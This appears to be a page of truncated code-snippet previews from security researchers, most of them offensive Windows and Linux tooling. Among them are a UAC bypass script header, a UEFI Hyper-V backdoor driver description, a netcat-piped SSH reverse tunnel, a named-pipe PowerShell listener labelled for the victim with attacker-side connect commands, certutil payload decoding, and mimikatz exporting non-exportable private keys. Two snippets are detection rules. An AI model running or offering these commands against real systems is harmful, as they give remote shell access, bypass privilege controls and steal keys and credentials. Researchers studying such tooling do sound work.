tyranid

# Powershell script to bypass UAC on Vista+ assuming
# there exists one elevated process on the same desktop.
# Technical details in:
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
# You need to Install-Module NtObjectManager for this to run.

Import-Module NtObjectManager

Cr4sh

/*
 *********************************************************************

  Part of UEFI DXE driver code that injects Hyper-V VM exit handler
  backdoor into the Device Guard enabled Windows 10 Enterprise.
  
  Execution starts from new_ExitBootServices() -- a hook handler 
  for EFI_BOOT_SERVICES.ExitBootServices() which being called by
  winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
  transfers exeution to previously loaded Hyper-V kernel (hvix64.sys)

mattifestation

# Define the signature - i.e. __EventFilter
$EventFilterArgs = @{
    EventNamespace = 'root/cimv2'
    Name = 'LateralMovementEvent'
    Query = 'SELECT * FROM MSFT_WmiProvider_ExecMethodAsyncEvent_Pre WHERE ObjectPath="Win32_Process" AND MethodName="Create"'
    QueryLanguage = 'WQL'
}

$InstanceArgs = @{
    Namespace = 'root/subscription'

williballenthin

rule stack_strings
{
    meta:
        author = "William Ballenthin"
        email = "william.ballenthin@fireeye.com"
        license = "Apache 2.0"
        copyright = "FireEye, Inc"
        description = "Match x86 that appears to be stack string creation."

    strings:

pry0cc

mode=$1
local_ip=$2
local_port=$3

function serv_ins {
	echo "ssh -N -R $local_port:localhost:22 root@$local_ip" | sudo timeout 2 nc -l -c -p $local_port
}

if [ $mode = -s ]
	then

mattifestation

echo -----BEGIN CERTIFICATE----- > encoded.txt
echo Just Base64 encode your binary data
echo TVoAAA== >> encoded.txt
echo -----END CERTIFICATE----- >> encoded.txt
certutil -decode encoded.txt decoded.bin

mattifestation

# Command to run on the victim
# This will establish a PowerShell listener over the "pwnme" named pipe
remote /S "powershell.exe" pwnme

# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client)
runas /netonly /user:[Domain|Hostname\Username] "cmd"
remote /C [Hostname\IP] "pwnme"

tothi

#
# multi-command mimikatz in a Cobalt Strike beacon extending the built-in mimikatz functionality
#
# cmd separator is |
#
# practical example: export machine certificates (including non-exportable private key :)):
#
# mmimikatz "crypto::capi|crypto::certificates /systemstore:local_machine /store:my /export"
#

mattifestation

<#
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
#>

function Get-WmiNamespace {
    [OutputType([String])]
    Param (
        [String]
        [ValidateNotNullOrEmpty()]

mattifestation

# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/

<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
    ResourceID = "[Script]ScriptExample";
    GetScript = "\"$(Get-Date): I am being GET\"     | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
    TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";